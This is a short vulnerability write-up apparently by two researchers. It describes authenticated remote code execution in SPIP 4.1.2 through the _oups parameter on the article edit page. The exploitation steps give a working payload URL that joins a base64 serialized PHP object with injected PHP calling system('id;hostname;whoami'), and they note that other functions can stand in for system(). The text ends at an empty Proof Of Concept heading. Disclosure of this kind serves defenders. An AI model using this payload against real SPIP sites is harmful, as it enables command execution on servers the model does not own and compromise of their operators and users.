
Remote Code Execution on SPIP 4.1.2

By Abyss Watcher & SpawnZii

Local environment

SPIP 4.1.2 with the "parano" security mode enabled; everything else left at the default configuration.

Requirements

  • A user account with author role.
  • An article to edit.

Vulnerable code

The _oups GET parameter handled in prive/formulaires/editer_liens.php (https://github.com/spip/SPIP/blob/master/prive/formulaires/editer_liens.php#L133), reachable from the article edit page (exec=article). The link points at master, so the line number may have shifted relative to the 4.1.2 code.

Exploitation

  • Log in at http://your_host/spip.php?page=login.

  • If you do not have an article yet, create one at http://your_host/ecrire/?exec=article_edit&new=oui and note its id.

  • In the following URL, replace ID_OF_YOUR_ARTICLE with the id of that article (the payload is shown decoded; the browser URL-encodes the quotes and angle brackets and PHP decodes them again before _oups is read):
    http://your_host/ecrire/?exec=article&id_article=ID_OF_YOUR_ARTICLE&_oups=TzoxOiJBIjoxOntzOjE6ImEiO3M6MzoiUG9DIjt9'"><?php system('id;hostname;whoami');?>

  • Note: the base64 prefix decodes to the serialized PHP object O:1:"A":1:{s:1:"a";s:3:"PoC";}; the system() call can be replaced by another PHP function such as phpinfo() or exec().

  • Load the URL; the output of the command appears in the response.

Proof Of Concept
